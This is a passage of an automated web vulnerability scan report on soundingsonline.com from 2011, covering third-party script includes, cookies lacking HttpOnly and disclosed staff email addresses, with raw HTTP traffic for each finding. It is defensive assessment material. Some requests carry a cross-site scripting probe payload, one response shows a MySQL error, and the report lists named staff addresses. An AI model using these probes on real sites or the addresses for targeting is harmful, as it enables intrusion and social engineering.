Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.47. http://www.soundingsonline.com/subscription-services/preview-current-issue  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/preview-current-issue

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /subscription-services/preview-current-issue HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.48. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/subscribe-to-e-newsletter

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /subscription-services/subscribe-to-e-newsletter HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:47:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:47:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

6. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



6.1. http://www.soundingsonline.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 00:09:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=tuebuqj09e756i1v904bm8i7l6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

6.2. http://www.soundingsonline.com/archives  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:27:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:27:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...

7. Email addresses disclosed  previous  next
There are 49 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


7.1. http://www.soundingsonline.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 00:09:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=tuebuqj09e756i1v904bm8i7l6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.2. http://www.soundingsonline.com/about-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /about-us

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about-us HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.3. http://www.soundingsonline.com/advertise  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /advertise

Issue detail

The following email addresses were disclosed in the response:

Request

GET /advertise HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:30:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:30:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:tmarion@soundingspub.com">tmarion@soundingspub.com</a>
...[SNIP]...
<a href="mailto:f.lavigne@soundingspub.com">f.lavigne@soundingspub.com</a>
...[SNIP]...
<a href="mailto:ryanvincent@soundingspub.com">ryanvincent@soundingspub.com</a>
...[SNIP]...
<a href="mailto:wayne@soundingspub.com">wayne@soundingspub.com</a>
...[SNIP]...
<a href="mailto:amber@soundingspub.com">amber@soundingspub.com</a>
...[SNIP]...
<a href="mailto:w.connor@soundingspub.com">w.connor@soundingspub.com</a>
...[SNIP]...
<a href="mailto:m.boyles@soundingspub.com">m.boyles@soundingspub.com</a>
...[SNIP]...
<a href="mailto:c.francis@soundingspub.com">c.francis@soundingspub.com</a>
...[SNIP]...
<a href="mailto:amber@soundingspub.com">amber@soundingspub.com</a>
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.4. http://www.soundingsonline.com/archives  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The following email addresses were disclosed in the response:

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:27:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:27:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.5. http://www.soundingsonline.com/boat-shop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.6. http://www.soundingsonline.com/boat-shop/know-how  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/know-how

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop/know-how HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.7. http://www.soundingsonline.com/boat-shop/new-boats  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-boats

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop/new-boats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.8. http://www.soundingsonline.com/boat-shop/new-gear  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-gear

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop/new-gear HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.9. http://www.soundingsonline.com/boat-shop/on-powerboats  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-powerboats

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop/on-powerboats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.10. http://www.soundingsonline.com/boat-shop/on-sailboats  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-sailboats

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop/on-sailboats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.11. http://www.soundingsonline.com/boat-shop/q-a-a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/q-a-a

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop/q-a-a HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
